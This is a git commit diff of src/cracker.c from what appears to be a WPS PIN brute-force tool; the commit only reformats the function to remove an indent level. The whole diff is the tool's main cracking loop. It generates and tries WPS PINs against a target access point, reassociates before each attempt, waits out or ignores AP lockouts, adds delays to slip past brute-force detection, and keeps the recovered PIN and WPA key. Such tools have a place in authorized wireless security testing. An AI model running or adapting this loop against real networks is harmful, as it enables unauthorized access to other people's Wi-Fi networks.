cracker: remove indent level
This commit is contained in:
parent
c6baab313d
commit
231df4a616
355
src/cracker.c
355
src/cracker.c
|
@ -58,219 +58,216 @@ void crack()
|
|||
/* Initialize network interface */
|
||||
set_handle(capture_init(get_iface()));
|
||||
|
||||
if(get_handle() != NULL)
|
||||
if(get_handle() == NULL) {
|
||||
cprintf(CRITICAL, "[-] Failed to initialize interface '%s'\n", get_iface());
|
||||
return;
|
||||
}
|
||||
generate_pins();
|
||||
|
||||
/* Restore any previously saved session */
|
||||
if(get_static_p1() == NULL || !get_pin_string_mode())
|
||||
{
|
||||
generate_pins();
|
||||
/* Check the specified 4/8 digit WPS PIN has been already tried */
|
||||
if (restore_session() == -1) return;
|
||||
}
|
||||
|
||||
/* Restore any previously saved session */
|
||||
if(get_static_p1() == NULL || !get_pin_string_mode())
|
||||
/* Convert BSSID to a string */
|
||||
bssid = mac2str(get_bssid(), ':');
|
||||
|
||||
/*
|
||||
* We need to get some basic info from the AP, and also want to make sure the target AP
|
||||
* actually exists, so wait for a beacon packet
|
||||
*/
|
||||
cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid);
|
||||
read_ap_beacon();
|
||||
cprintf(INFO, "[+] Received beacon from %s\n", bssid);
|
||||
char *vendor;
|
||||
if((vendor = get_vendor_string(get_vendor())))
|
||||
cprintf(INFO, "[+] Vendor: %s\n", vendor);
|
||||
/* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */
|
||||
if(get_max_pin_attempts() == -1)
|
||||
{
|
||||
cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
|
||||
return;
|
||||
}
|
||||
|
||||
#if 0
|
||||
/* This initial association is just to make sure we can successfully associate */
|
||||
while(!reassociate())
|
||||
{
|
||||
if(assoc_fail_count == MAX_ASSOC_FAILURES)
|
||||
{
|
||||
/* Check the specified 4/8 digit WPS PIN has been already tried */
|
||||
if (restore_session() == -1) return;
|
||||
assoc_fail_count = 0;
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
}
|
||||
else
|
||||
{
|
||||
assoc_fail_count++;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
|
||||
/* Convert BSSID to a string */
|
||||
bssid = mac2str(get_bssid(), ':');
|
||||
/* Used to calculate pin attempt rates */
|
||||
start_time = time(NULL);
|
||||
|
||||
/* If the key status hasn't been explicitly set by restore_session(), ensure that it is set to KEY1_WIP */
|
||||
if(get_key_status() <= KEY1_WIP)
|
||||
{
|
||||
set_key_status(KEY1_WIP);
|
||||
}
|
||||
/*
|
||||
* If we're starting a session at KEY_DONE, that means we've already cracked the pin and the AP is being re-attacked.
|
||||
* Re-set the status to KEY2_WIP so that we properly enter the main cracking loop.
|
||||
*/
|
||||
else if(get_key_status() == KEY_DONE)
|
||||
{
|
||||
set_key_status(KEY2_WIP);
|
||||
}
|
||||
|
||||
/* Main cracking loop */
|
||||
for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++)
|
||||
{
|
||||
/*
|
||||
* Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
|
||||
* registrar requests. Using a delay here can help prevent the AP from locking us out.
|
||||
*/
|
||||
pcap_sleep(get_delay());
|
||||
|
||||
/* Users may specify a delay after x number of attempts */
|
||||
if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Entering recurring delay of %d seconds\n", get_recurring_delay());
|
||||
pcap_sleep(get_recurring_delay());
|
||||
sleep_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* We need to get some basic info from the AP, and also want to make sure the target AP
|
||||
* actually exists, so wait for a beacon packet
|
||||
* Some APs identify brute force attempts and lock themselves for a short period of time (typically 5 minutes).
|
||||
* Verify that the AP is not locked before attempting the next pin.
|
||||
*/
|
||||
cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid);
|
||||
read_ap_beacon();
|
||||
cprintf(INFO, "[+] Received beacon from %s\n", bssid);
|
||||
char *vendor;
|
||||
if((vendor = get_vendor_string(get_vendor())))
|
||||
cprintf(INFO, "[+] Vendor: %s\n", vendor);
|
||||
/* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */
|
||||
if(get_max_pin_attempts() == -1)
|
||||
while(get_ignore_locks() == 0 && is_wps_locked())
|
||||
{
|
||||
cprintf(WARNING, "[!] WARNING: Detected AP rate limiting, waiting %d seconds before re-checking\n", get_lock_delay());
|
||||
pcap_sleep(get_lock_delay());
|
||||
|
||||
}
|
||||
|
||||
/* Initialize wps structure */
|
||||
set_wps(initialize_wps_data());
|
||||
if(!get_wps())
|
||||
{
|
||||
cprintf(CRITICAL, "[X] ERROR: This device has been blacklisted and is not supported.\n");
|
||||
return;
|
||||
cprintf(CRITICAL, "[-] Failed to initialize critical data structure\n");
|
||||
break;
|
||||
}
|
||||
|
||||
#if 0
|
||||
/* This initial association is just to make sure we can successfully associate */
|
||||
while(!reassociate())
|
||||
{
|
||||
/* Try the next pin in the list */
|
||||
pin = build_next_pin();
|
||||
if(!pin)
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to generate the next payload\n");
|
||||
break;
|
||||
}
|
||||
else
|
||||
{
|
||||
cprintf(WARNING, "[+] Trying pin \"%s\"\n", pin);
|
||||
}
|
||||
|
||||
/*
|
||||
* Reassociate with the AP before each WPS exchange. This is necessary as some APs will
|
||||
* severely limit our pin attempt rate if we do not.
|
||||
*/
|
||||
assoc_fail_count = 0;
|
||||
while(!reassociate())
|
||||
{
|
||||
if(assoc_fail_count == MAX_ASSOC_FAILURES)
|
||||
{
|
||||
assoc_fail_count = 0;
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
}
|
||||
else
|
||||
{
|
||||
assoc_fail_count++;
|
||||
}
|
||||
}
|
||||
#endif
|
||||
}
|
||||
cprintf(INFO, "[+] Associated with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
|
||||
/* Used to calculate pin attempt rates */
|
||||
start_time = time(NULL);
|
||||
|
||||
/* If the key status hasn't been explicitly set by restore_session(), ensure that it is set to KEY1_WIP */
|
||||
if(get_key_status() <= KEY1_WIP)
|
||||
{
|
||||
set_key_status(KEY1_WIP);
|
||||
}
|
||||
/*
|
||||
* If we're starting a session at KEY_DONE, that means we've already cracked the pin and the AP is being re-attacked.
|
||||
* Re-set the status to KEY2_WIP so that we properly enter the main cracking loop.
|
||||
* Enter receive loop. This will block until a receive timeout occurs or a
|
||||
* WPS transaction has completed or failed.
|
||||
*/
|
||||
else if(get_key_status() == KEY_DONE)
|
||||
{
|
||||
set_key_status(KEY2_WIP);
|
||||
}
|
||||
result = do_wps_exchange();
|
||||
|
||||
/* Main cracking loop */
|
||||
for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++)
|
||||
switch(result)
|
||||
{
|
||||
/*
|
||||
* Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
|
||||
* registrar requests. Using a delay here can help prevent the AP from locking us out.
|
||||
* If the last pin attempt was rejected, increment
|
||||
* the pin counter, clear the fail counter and move
|
||||
* on to the next pin.
|
||||
*/
|
||||
pcap_sleep(get_delay());
|
||||
|
||||
/* Users may specify a delay after x number of attempts */
|
||||
if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Entering recurring delay of %d seconds\n", get_recurring_delay());
|
||||
pcap_sleep(get_recurring_delay());
|
||||
sleep_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* Some APs identify brute force attempts and lock themselves for a short period of time (typically 5 minutes).
|
||||
* Verify that the AP is not locked before attempting the next pin.
|
||||
*/
|
||||
while(get_ignore_locks() == 0 && is_wps_locked())
|
||||
{
|
||||
cprintf(WARNING, "[!] WARNING: Detected AP rate limiting, waiting %d seconds before re-checking\n", get_lock_delay());
|
||||
pcap_sleep(get_lock_delay());
|
||||
|
||||
}
|
||||
|
||||
/* Initialize wps structure */
|
||||
set_wps(initialize_wps_data());
|
||||
if(!get_wps())
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to initialize critical data structure\n");
|
||||
break;
|
||||
}
|
||||
|
||||
/* Try the next pin in the list */
|
||||
pin = build_next_pin();
|
||||
if(!pin)
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to generate the next payload\n");
|
||||
break;
|
||||
}
|
||||
else
|
||||
{
|
||||
cprintf(WARNING, "[+] Trying pin \"%s\"\n", pin);
|
||||
}
|
||||
|
||||
/*
|
||||
* Reassociate with the AP before each WPS exchange. This is necessary as some APs will
|
||||
* severely limit our pin attempt rate if we do not.
|
||||
*/
|
||||
assoc_fail_count = 0;
|
||||
while(!reassociate())
|
||||
{
|
||||
if(assoc_fail_count == MAX_ASSOC_FAILURES)
|
||||
{
|
||||
assoc_fail_count = 0;
|
||||
cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
}
|
||||
else
|
||||
{
|
||||
assoc_fail_count++;
|
||||
}
|
||||
}
|
||||
cprintf(INFO, "[+] Associated with %s (ESSID: %s)\n", bssid, get_ssid());
|
||||
|
||||
|
||||
/*
|
||||
* Enter receive loop. This will block until a receive timeout occurs or a
|
||||
* WPS transaction has completed or failed.
|
||||
*/
|
||||
result = do_wps_exchange();
|
||||
|
||||
switch(result)
|
||||
{
|
||||
/*
|
||||
* If the last pin attempt was rejected, increment
|
||||
* the pin counter, clear the fail counter and move
|
||||
* on to the next pin.
|
||||
*/
|
||||
case KEY_REJECTED:
|
||||
fail_count = 0;
|
||||
pin_count++;
|
||||
advance_pin_count();
|
||||
break;
|
||||
/* Got it!! */
|
||||
case KEY_ACCEPTED:
|
||||
break;
|
||||
/* Unexpected timeout or EAP failure...try this pin again */
|
||||
default:
|
||||
cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), re-trying last pin\n", result);
|
||||
fail_count++;
|
||||
break;
|
||||
}
|
||||
|
||||
/* If we've had an excessive number of message failures in a row, print a warning */
|
||||
if(fail_count == WARN_FAILURE_COUNT)
|
||||
{
|
||||
cprintf(WARNING, "[!] WARNING: %d failed connections in a row\n", fail_count);
|
||||
case KEY_REJECTED:
|
||||
fail_count = 0;
|
||||
pcap_sleep(get_fail_delay());
|
||||
}
|
||||
|
||||
/* Display status and save current session state every DISPLAY_PIN_COUNT loops */
|
||||
if(loop_count == DISPLAY_PIN_COUNT)
|
||||
{
|
||||
save_session();
|
||||
display_status(pin_count, start_time);
|
||||
loop_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* The WPA key and other settings are stored in the globule->wps structure. If we've
|
||||
* recovered the WPS pin and parsed these settings, don't free this structure. It
|
||||
* will be freed by wpscrack_free() at the end of main().
|
||||
*/
|
||||
if(get_key_status() != KEY_DONE)
|
||||
{
|
||||
wps_deinit(get_wps());
|
||||
set_wps(NULL);
|
||||
}
|
||||
/* If we have cracked the pin, save a copy */
|
||||
else
|
||||
{
|
||||
set_pin(pin);
|
||||
}
|
||||
free(pin);
|
||||
pin = NULL;
|
||||
|
||||
/* If we've hit our max number of pin attempts, quit */
|
||||
if((get_max_pin_attempts() > 0) &&
|
||||
(pin_count == get_max_pin_attempts()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts());
|
||||
pin_count++;
|
||||
advance_pin_count();
|
||||
break;
|
||||
/* Got it!! */
|
||||
case KEY_ACCEPTED:
|
||||
break;
|
||||
/* Unexpected timeout or EAP failure...try this pin again */
|
||||
default:
|
||||
cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), re-trying last pin\n", result);
|
||||
fail_count++;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(bssid) free(bssid);
|
||||
if(get_handle())
|
||||
/* If we've had an excessive number of message failures in a row, print a warning */
|
||||
if(fail_count == WARN_FAILURE_COUNT)
|
||||
{
|
||||
pcap_close(get_handle());
|
||||
set_handle(NULL);
|
||||
cprintf(WARNING, "[!] WARNING: %d failed connections in a row\n", fail_count);
|
||||
fail_count = 0;
|
||||
pcap_sleep(get_fail_delay());
|
||||
}
|
||||
}
|
||||
else
|
||||
|
||||
/* Display status and save current session state every DISPLAY_PIN_COUNT loops */
|
||||
if(loop_count == DISPLAY_PIN_COUNT)
|
||||
{
|
||||
save_session();
|
||||
display_status(pin_count, start_time);
|
||||
loop_count = 0;
|
||||
}
|
||||
|
||||
/*
|
||||
* The WPA key and other settings are stored in the globule->wps structure. If we've
|
||||
* recovered the WPS pin and parsed these settings, don't free this structure. It
|
||||
* will be freed by wpscrack_free() at the end of main().
|
||||
*/
|
||||
if(get_key_status() != KEY_DONE)
|
||||
{
|
||||
wps_deinit(get_wps());
|
||||
set_wps(NULL);
|
||||
}
|
||||
/* If we have cracked the pin, save a copy */
|
||||
else
|
||||
{
|
||||
set_pin(pin);
|
||||
}
|
||||
free(pin);
|
||||
pin = NULL;
|
||||
|
||||
/* If we've hit our max number of pin attempts, quit */
|
||||
if((get_max_pin_attempts() > 0) &&
|
||||
(pin_count == get_max_pin_attempts()))
|
||||
{
|
||||
cprintf(VERBOSE, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts());
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(bssid) free(bssid);
|
||||
if(get_handle())
|
||||
{
|
||||
cprintf(CRITICAL, "[-] Failed to initialize interface '%s'\n", get_iface());
|
||||
pcap_close(get_handle());
|
||||
set_handle(NULL);
|
||||
}
|
||||
}
|
||||
|
||||
|
|
Loading…
Reference in New Issue